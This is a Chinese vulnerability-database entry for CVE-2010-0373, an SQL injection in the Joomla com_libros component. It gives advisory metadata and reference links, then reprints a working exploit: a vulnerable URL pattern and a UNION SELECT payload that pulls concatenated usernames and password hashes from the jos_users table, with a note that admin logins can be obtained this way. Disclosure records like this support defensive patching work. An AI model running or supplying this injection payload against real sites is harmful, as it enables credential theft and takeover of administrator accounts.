Joomla! libros 组件 SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118917 漏洞类型 SQL注入
发布时间 2010-01-17 更新时间 2010-01-22
CVE编号 CVE-2010-0373 CNNVD-ID CNNVD-201001-223
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/11178
https://cxsecurity.com/issue/WLB-2010010192
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201001-223
|漏洞详情
Joomla!的libros(com_libros)组件中存在SQL注入漏洞,远程攻击者可以借助index.php的detail操作的id暗示执行任意SQL命令。
|漏洞EXP
########################################################################
#        Joomla Component com_libros SQL Injection Vulnerability
########################################################################
# Author   :FL0RiX
#
# Name     : com_libros
#
# Bug Type   : SQL Injection
#
# Infection    : Admin login bilgileri alinabilir.
#
# Demo Vuln :
#
# http://server/index.php?option=com_libros&task=detail&Itemid=27&id=[EXPLOIT]
#Exploit:null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+jos_users--
########################################################################
|参考资料

来源:XF
名称:libros-index-sql-injection(55696)
链接:http://xforce.iss.net/xforce/xfdb/55696
来源:MISC
链接:http://www.exploit-db.com/exploits/11178
来源:MISC
链接:http://packetstormsecurity.org/1001-exploits/joomlalibros-sql.txt